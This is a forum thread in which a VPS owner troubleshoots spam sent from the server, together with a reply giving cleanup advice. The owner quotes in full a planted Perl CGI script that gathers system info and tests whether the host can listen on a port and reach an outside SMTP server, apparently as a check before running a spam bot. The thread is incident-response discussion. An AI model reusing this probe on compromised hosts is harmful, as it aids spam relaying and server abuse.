spam sending from my email

V

ViruSzZ

New member
Joined
Mar 20, 2012
Messages
3
Hi there,

i'm having issues with a spam email messages being sent from my centos 5 vps with DA installed on it.

actually, it is weird to me because there is nothing wrong on the vps. the email I got from spamcop is having the following email headers:

Code: 
1. Received: from my.vps-hostname.com (my.vps-hostname.com [XXX.XXX.XXX.XXX])
by homiemail-mx21.g.dreamhost.com (Postfix) with SMTP id 26F986D89F5

2. Received: from caibbdcaaaaf.dreamhost.com (HELO homiemail-mx21.g.dreamhost.com) (208.113.200.5)
by mxin2.cesmail.net with SMTP; 13 Jul 2012 21:12:00 -0000

3. Received: from unknown (192.168.1.86)
by filter7.cesmail.net with QMQP; 13 Jul 2012 21:09:28 -0000

4. Received: from unknown (HELO filter7.cesmail.net) ([192.168.1.217])
by c60.cesmail.net with SMTP; 13 Jul 2012 17:09:36 -0400

5. Received: from c60.cesmail.net (c60.cesmail.net [216.154.195.49])
(using TLSv1 with cipher RC4-SHA (128/128 bits))
(No client certificate requested)
by homiemail-mx22.g.dreamhost.com (Postfix) with ESMTPS id C90CF200F11

then I came up with the following URL http://www.spamcop.net/fom-serve/cache/385.html and I scanned my vps using rkhunter and maldetect and everything was ok.

in the email from spamcop they're saying that my server's IP is an open proxy and that's how the emails were sent but I do not have such proxy on my vps and am little confused regarding this.

so can someone shed-light me on this, how am I supposed to track and fix this issue down?

thank you
 
to follow up on this:

i found this perl script in one user's public_html/cgi-bin/2613231580.pl

Code: 
#!/usr/bin/perl -w

        $| = 1;

        print "Content-type: text/plain; charset=windows-1251\n\n" if $ENV{HTTP_USER_AGENT};

        print "System info\n";
        print "-----------\n\n";
        print "$^O";
        print "\n", `uname -a` if $^O !~ /win/i;
        print "\n\n";

        print "Perl modules\n";
        print "------------\n\n";
        print "strict .......................... ";
        unless (eval ("use strict; return 1;")) { print "Error"; } else { print "Ok"; }
        print "\nSys::Hostname ................... ";
        unless (eval ("use Sys::Hostname; return 1;")) { print "Error"; } else { print "Ok"; }
        print "\nPOSIX ........................... ";
        unless (eval ("use POSIX qw(setsid); return 1;")) { print "Error"; } else { print "Ok"; }
        print "\nErrno ........................... ";
        unless (eval ("use Errno qw(EINPROGRESS); return 1;")) { print "Error"; } else { print "Ok"; }
        print "\nIO::Socket ...................... ";
        unless (eval ("use IO::Socket qw(:DEFAULT :crlf); return 1;")) { print "Error"; } else { use IO::Socket qw(:DEFAULT :crlf); print "Ok"; }
        print "\nIO::Select ...................... ";
        unless (eval ("use IO::Select; return 1;")) { print "Error"; } else { print "Ok"; }
        print "\n\n";

        print "Server test\n";
        print "-----------\n\n";
        my $s = IO::Socket::INET->new(Proto => "tcp", LocalPort => 36000, Listen => SOMAXCONN, Reuse => 1);
        unless ($s) { print "Error"; } else { close $s; print "Ok"; }
        print "\n\n";

        print "Client test\n";
        print "-----------\n\n";
        my $r = (gethostbyname "smtp.mail.ru")[4];
        unless ($r) { print "Error > Can't resolve hostname"; exit; }
        $s = IO::Socket::INET->new(Proto => "tcp", Type => SOCK_STREAM);
        unless ($s) { print "Error > Can't create socket > $!"; exit; }
        unless ($s->connect(pack ("Sna4x8", 2, 25, $r))) { close $s; print "Error > Can't connect > $!"; exit; }
        $r = <$s>; close $s;
        if (length $r) { print "Ok\n$r"; } else { print "Error > Can't read response"; }

i moved it, fixed the permissions the public_html/ directory and files within it and disabled CGI/Perl.

also, i got warnings about malware on the user's site.

HTML/Iframe.B.Gen virus => http://www.eset.eu/virus/html-iframe-b-gen

any tips what should be the best to do next? look and clean the system or simply wipe it out?
 
If you got a useraccount infected with iframe stuff, it's probably some lines in the index file.
This can be caused by "home made" scripts or can be hacked because the software version is too old, like old and insecure Joomla or Wordpress versions or plugins.

It's case to remove the iframe lines or remove the complete index file.
Change ftp passwords of the user, but don't mail it to him. Let him first take care the user has an up2date virusscanner on his pc and let him scan with the virusscanner and malware bytes.

If all online software is up2date and the pc is clean, send him the new passwords and things should probably be fine.

You can also check your logs if you can find which ip uploaded the pl script and block him.
 
You must log in or register to reply here.
Back
Top